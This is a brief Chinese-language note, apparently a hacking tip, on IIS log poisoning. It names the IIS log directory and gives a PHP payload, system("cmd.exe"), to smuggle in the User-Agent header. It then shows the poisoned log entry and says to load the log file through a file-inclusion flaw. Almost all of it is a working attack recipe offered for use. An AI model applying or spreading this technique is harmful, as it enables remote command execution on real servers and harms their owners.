C:\Windows\System32\LogFiles\w3svcXXXX
让php解析当天访问日志，然后用get请求提交user agent为
User-Agent: <?php system("cmd.exe");?>
于是当天日志加入了
2011-01-01 16:25:06 W3SVC1 10.247.186.114 GET /index.asp - 80 - xxxxxxxxxxxxxxxxxx <?php+system("cmd.exe");+?> 200 0 0
然后用漏洞加载这个文件即可